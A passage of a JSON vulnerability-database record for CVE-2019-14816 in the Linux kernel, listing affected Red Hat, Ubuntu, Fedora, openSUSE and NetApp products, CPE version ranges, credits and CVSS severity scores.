        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "30"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "fas2750",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fas2720",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "c190",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "messaging realtime grid",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2.17"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.194"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "a320",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.75"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.74"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "model": "enterprise linux tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "5.3"
      },
      {
        "model": "enterprise linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": "enterprise mrg",
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.2.17",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.194",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.194",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.146",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.75",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.74",
                "versionStartIncluding": "3.6",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:virtualization:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_tus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:messaging_realtime_grid:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_compute_node_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian_eus:7.6_ppc64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a320_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a320:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:c190_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:c190:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a220_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a220:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas2720_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas2720:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas2750_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas2750:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a800_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "156602"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "157140"
      },
      {
        "db": "PACKETSTORM",
        "id": "156608"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-14816",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2019-14816",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "secalert@redhat.com",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.8,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-14816",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
